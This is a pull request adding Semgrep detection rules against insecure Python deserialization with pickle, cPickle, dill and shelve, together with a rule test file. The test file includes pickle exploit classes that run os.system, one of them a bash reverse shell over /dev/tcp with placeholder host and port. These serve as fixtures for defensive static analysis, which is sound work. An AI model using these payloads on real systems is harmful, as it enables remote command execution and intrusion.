### PR TITLE
Add Pickle related deserialization checks

### DIFF
--- a/python/lang/security/deserialization/pickle.py
+++ b/python/lang/security/deserialization/pickle.py
@@ -9,6 +9,7 @@ class Exploit(object):
 
 # Attacker serializes the exploit
 def serialize_exploit():
+  # ruleid: avoid-pickle
   shellcode = _pickle.dumps(Exploit())
   return shellcode
 

--- a/python/lang/security/deserialization/pickle.py
+++ b/python/lang/security/deserialization/pickle.py
@@ -1,0 +1,51 @@
+# Import dependencies
+import os
+import _pickle
+
+# Attacker prepares exploit that application will insecurely deserialize
+class Exploit(object):
+  def __reduce__(self):
+    return (os.system, ('whoami',))
+
+# Attacker serializes the exploit
+def serialize_exploit():
+  shellcode = _pickle.dumps(Exploit())
+  return shellcode
+
+# Application insecurely deserializes the attacker's serialized data
+def insecure_deserialization(exploit_code):
+  # ok 
+  # _pickle.loads(exploit_code)
+  
+  # ruleid: avoid-pickle
+  _pickle.loads(exploit_code)
+
+# Application insecurely deserializes the attacker's serialized data
+def insecure_deserialization_2(exploit_code):
+  import _pickle as adaasfa
+  # ruleid: avoid-pickle
+  adaasfa.loads(exploit_code)
+
+import cPickle
+import socket
+
+class Shell_code(object):
+  def __reduce__(self):
+          return (os.system,('/bin/bash -i >& /dev/tcp/"Client IP"/"Listening PORT" 0>&1',))
+# ruleid: avoid-cPickle
+shell = cPickle.dumps(Shell_code())
+
+import dill
+# ruleid: avoid-dill
+shell = dill.dumps(Shell_code())
+
+import shelve
+# ruleid: avoid-shelve
+myShelve = shelve.open(Shell_code())
+
+if __name__ == '__main__':
+  # Serialize the exploit
+  shellcode = serialize_exploit()
+
+  # Attacker's payload runs a `whoami` command
+  insecure_deserialization(shellcode)

--- a/python/lang/security/deserialization/pickle.yaml
+++ b/python/lang/security/deserialization/pickle.yaml
@@ -2,6 +2,7 @@ rules:
   - id: avoid-pickle 
     metadata:
       owasp: "A8: Insecure Deserialization"
+      cwe: "CWE-502: Deserialization of Untrusted Data"
       references: https://docs.python.org/3/library/pickle.html
     languages:
     - python
@@ -14,6 +15,7 @@ rules:
   - id: avoid-cPickle 
     metadata:
       owasp: "A8: Insecure Deserialization"
+      cwe: "CWE-502: Deserialization of Untrusted Data"
       references: https://docs.python.org/3/library/pickle.html
     languages:
     - python
@@ -25,6 +27,7 @@ rules:
   - id: avoid-dill 
     metadata:
       owasp: "A8: Insecure Deserialization"
+      cwe: "CWE-502: Deserialization of Untrusted Data"
       references: https://docs.python.org/3/library/pickle.html
     languages:
     - python
@@ -37,6 +40,7 @@ rules:
   - id: avoid-shelve
     metadata:
       owasp: "A8: Insecure Deserialization"
+      cwe: "CWE-502: Deserialization of Untrusted Data"
       references: https://docs.python.org/3/library/pickle.html
     languages:
     - python

--- a/python/lang/security/deserialization/pickle.yaml
+++ b/python/lang/security/deserialization/pickle.yaml
@@ -1,0 +1,48 @@
+rules:
+  - id: avoid-pickle 
+    metadata:
+      owasp: "A8: Insecure Deserialization"
+      references: https://docs.python.org/3/library/pickle.html
+    languages:
+    - python
+    message:
+      Avoid using `pickle` library which is known to lead to remote code execution vulnerabilities.
+    severity: WARNING
+    pattern-either:
+      - pattern: pickle.$FUNC(...)
+      - pattern: _pickle.$FUNC(...)
+  - id: avoid-cPickle 
+    metadata:
+      owasp: "A8: Insecure Deserialization"
+      references: https://docs.python.org/3/library/pickle.html
+    languages:
+    - python
+    message: 
+      Avoid using `cPickle` library as it is backed by `pickle` 
+      which is known to lead to remote code execution vulnerabilities.
+    severity: WARNING
+    pattern: cPickle.$FUNC(...)
+  - id: avoid-dill 
+    metadata:
+      owasp: "A8: Insecure Deserialization"
+      references: https://docs.python.org/3/library/pickle.html
+    languages:
+    - python
+    message:
+      Avoid using `dill` library as it is backed by `pickle` 
+      which is known to lead to remote code execution vulnerabilities.
+    severity: WARNING
+    pattern-either:
+      - pattern: dill.$FUNC(...)
+  - id: avoid-shelve
+    metadata:
+      owasp: "A8: Insecure Deserialization"
+      references: https://docs.python.org/3/library/pickle.html
+    languages:
+    - python
+    message: 
+      Avoid using `shelve` library as it is backed by `pickle` 
+      which is known to lead to remote code execution vulnerabilities.
+    severity: WARNING
+    pattern-either:
+      - pattern: shelve.$FUNC(...)


### PR DESCRIPTION
This adds blacklist of pickle, cPickle, dill, and shelve.
Addresses a part of https://github.com/returntocorp/semgrep-rules/issues/511